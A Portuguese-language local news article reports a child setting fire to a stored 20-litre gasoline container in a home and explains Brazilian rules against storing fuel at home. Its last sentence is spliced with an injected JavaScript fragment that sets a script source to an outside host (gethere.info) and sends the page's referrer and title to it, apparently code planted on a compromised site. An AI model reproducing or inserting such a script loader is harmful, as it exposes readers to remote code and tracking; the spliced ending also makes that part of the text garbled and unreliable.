Kariny Santos
Por pouco uma brincadeira de criança não acabou em tragédia no final da tarde de sexta-feira, 26, no bairro Jardim das Flores, uma criança de aproximadamente 07 anos ateou fogo em um galão de 20 litros que estava guardado em uma dispensa no fundo da casa.
Segundo o proprietário da residência Raimundo Sutero da Silva, 61 anos, ele e sua esposa haviam saído para realizar compras e seus netos estavam brincando, ao chegar ao mercado sua filha ligou para o mesmo comunicando que um dos seus netos havia ateado fogo no galão de 20 litros de gasolina que estavam na dispensa no fundo da sua residência.
O fogo foi controlado pelos Bombeiros Militar, apenas danos materiais foram registrados
ARMAZENAR COMBUSTÍVEL É PROIBIDO
De acordo com o artigo 56 da Lei 9.605/98, armazenar combustível ilegalmente é crime ambiental. Além do artigo, há a resolução nº 41, de 5 de novembro de 2013, da Agência Nacional de Petróleo (ANP) que reforça a proibição.
A gasolina é um líquido inflamável, a maioria não conhece quais são os perigos de armazenar substâncias inflamáveis em casa. A cada ano, ocorre cerca de quinhentas mortes e milhares de ferimentos atribuídos ao uso incorreto e o armazenamento impróprio de gasolina no Brasil.
Muitos incêndios de gasolina podem ser causados acidentalmente por crianças desavisadas sobre os perigos da gasolina e de seus vapores inflamáveis.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;